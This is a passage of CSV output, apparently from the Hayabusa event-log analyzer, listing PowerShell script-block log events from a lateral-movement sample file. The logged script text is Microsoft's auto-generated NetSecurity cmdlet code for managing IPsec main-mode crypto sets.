$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_retur",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"nValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' -Alias '*' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParam",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"nValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' -Alias '*' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParam",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' -Alias '*' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 